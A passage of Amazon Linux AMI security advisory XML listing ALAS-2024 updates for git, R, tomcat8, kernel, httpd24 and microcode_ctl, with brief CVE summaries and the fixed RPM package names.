arch="i686"><filename>Packages/git-instaweb-2.38.4-1.81.amzn1.i686.rpm</filename></package><package name="git" version="2.38.4" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.38.4-1.81.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.38.4" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.38.4-1.81.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.38.4" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.38.4-1.81.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.38.4" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.38.4-1.81.amzn1.i686.rpm</filename></package><package name="git-subtree" version="2.38.4" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/git-subtree-2.38.4-1.81.amzn1.i686.rpm</filename></package><package name="git-core" version="2.38.4" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/git-core-2.38.4-1.81.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1940</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1940: important priority package update for R</title><issued date="2024-06-19 18:46:00" /><updated date="2024-06-24 14:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-27322:
Deserialization of untrusted data can occur in the R statistical programming language, on any version starting at 1.4.0 up to and not including 4.4.0, enabling a maliciously crafted RDS (R Data Serialization) formatted file or R package to run arbitrary code on an end user's system when interacted with.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27322" title="" id="CVE-2024-27322" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libRmath-static" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/libRmath-static-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="libRmath-devel" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/libRmath-devel-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="R" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="R-devel" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-devel-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="R-java-devel" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-java-devel-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="R-java" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-java-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="R-core" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-core-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="R-core-devel" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-core-devel-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="libRmath" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/libRmath-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="R-debuginfo" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-debuginfo-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="libRmath-static" version="3.4.1" release="1.53.amzn1" epoch="0" 
arch="i686"><filename>Packages/libRmath-static-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="R-core-devel" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/R-core-devel-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="R-devel" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/R-devel-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="R-java" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/R-java-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="R" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/R-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="R-java-devel" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/R-java-devel-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="R-core" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/R-core-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="libRmath" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/libRmath-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="libRmath-devel" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/libRmath-devel-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="R-debuginfo" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/R-debuginfo-3.4.1-1.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1941</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1941: important priority package update for tomcat8</title><issued date="2024-06-19 18:46:00" /><updated date="2024-06-24 14:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following 
vulnerabilities:
CVE-2024-24549:
Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.
Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.
CVE-2024-23672:
Denial of Service via incomplete cleanup vulnerability in Apache Tomcat. It was possible for WebSocket clients to keep WebSocket connections open, leading to increased resource consumption. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.
Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23672" title="" id="CVE-2024-23672" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24549" title="" id="CVE-2024-24549" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-log4j" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package 
name="tomcat8-servlet-3.1-api" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.99-1.97.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1942</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1942: important priority package update for kernel</title><issued date="2024-06-19 18:46:00" /><updated date="2024-07-31 22:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-27020:
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: Fix potential data-race in __nft_expr_type_get()
CVE-2024-26976:
In the Linux kernel, the following vulnerability has been resolved:
KVM: Always flush async #PF workqueue when vCPU is being destroyed
CVE-2023-30456:
An issue was discovered in arch/x86/kvm/vmx/nested.c in the Linux kernel before 6.2.8. nVMX on x86_64 lacks consistency checks for CR0 and CR4.
CVE-2023-1077:
kernel: Type confusion in pick_next_rt_entity(), which can result in memory corruption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1077" title="" id="CVE-2023-1077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30456" title="" id="CVE-2023-30456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-26976" title="" id="CVE-2024-26976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27020" title="" id="CVE-2024-27020" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.348" release="187.562.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.348-187.562.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.348-187.562.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.348-187.562.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.348-187.562.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.348-187.562.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.348-187.562.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.348-187.562.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.348-187.562.amzn1.i686.rpm</filename></package><package 
name="perf-debuginfo" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.348-187.562.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.348-187.562.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1943</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1943: important priority package update for kernel</title><issued date="2024-07-03 21:01:00" /><updated date="2024-07-08 17:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-47110:
In the Linux kernel, the following vulnerability has been resolved:
x86/kvm: Disable kvmclock on all CPUs on shutdown
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-47110" title="" id="CVE-2021-47110" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.348" release="187.565.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.348-187.565.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1944</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1944: important priority package update for httpd24</title><issued date="2024-07-17 22:27:00" /><updated date="2024-07-24 17:27:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-38477:
Null pointer dereference in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows an attacker to crash the server via a malicious request.
Users are recommended to upgrade to version 2.4.60, which fixes this issue.
CVE-2024-38476:
The core of Apache HTTP Server 2.4.59 and earlier is vulnerable to information disclosure, SSRF or local script execution via backend applications whose response headers are malicious or exploitable.
Users are recommended to upgrade to version 2.4.60, which fixes this issue.
CVE-2024-38475:
Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure.
Substitutions in server context that use a backreference or variable as the first segment of the substitution are affected. Some unsafe RewriteRules will be broken by this change, and the rewrite flag "UnsafePrefixStat" can be used to opt back in once it has been ensured that the substitution is appropriately constrained.
CVE-2024-38474:
Substitution encoding issue in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to execute scripts in directories permitted by the configuration but not directly reachable by any URL, or to obtain source disclosure of scripts meant only to be executed as CGI.
Users are recommended to upgrade to version 2.4.60, which fixes this issue.
Some RewriteRules that capture and substitute unsafely will now fail unless rewrite flag "UnsafeAllow3F" is specified.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38474" title="" id="CVE-2024-38474" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38475" title="" id="CVE-2024-38475" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38476" title="" id="CVE-2024-38476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38477" title="" id="CVE-2024-38477" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-tools" version="2.4.61" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.61" release="1.103.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.61" release="1.103.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.61" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.61" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.61" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.61" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.61" release="1.103.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.61" release="1.103.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.61-1.103.amzn1.noarch.rpm</filename></package><package name="mod24_md" version="2.4.61" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.61" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.61-1.103.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.61" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.61-1.103.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.61" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.61-1.103.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.61" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.61-1.103.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.61" release="1.103.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.61-1.103.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.61" release="1.103.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.61-1.103.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.61" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.61-1.103.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.61" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.61-1.103.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.61" release="1.103.amzn1" epoch="0" 
arch="i686"><filename>Packages/mod24_ldap-2.4.61-1.103.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1945</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1945: important priority package update for kernel</title><issued date="2024-07-31 22:26:00" /><updated date="2025-02-27 23:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-39480:
In the Linux kernel, the following vulnerability has been resolved:
kdb: Fix buffer overflow during tab-complete
CVE-2024-38583:
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix use-after-free of timer for log writer thread
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38583" title="" id="CVE-2024-38583" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39480" title="" id="CVE-2024-39480" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.349" release="188.564.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="kernel" 
version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.349-188.564.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1946</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1946: important priority package update for microcode_ctl</title><issued date="2024-09-13 01:16:00" /><updated date="2024-09-17 16:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-49141:
Improper isolation in some Intel(R) Processors stream cache mechanism may allow an authenticated user to potentially enable escalation of privilege via local access.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49141" title="" id="CVE-2023-49141" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="microcode_ctl-debuginfo" version="2.1" release="47.43.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-debuginfo-2.1-47.43.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.43.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-2.1-47.43.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.43.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-debuginfo-2.1-47.43.amzn1.i686.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.43.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-2.1-47.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1947</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1947: important priority package update for kernel</title><issued date="2024-09-26 00:30:00" /><updated date="2024-10-03 10:50:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-39494:
In the Linux kernel, the following vulnerability has been resolved:
ima: Fix use-after-free on a dentry's dname.name
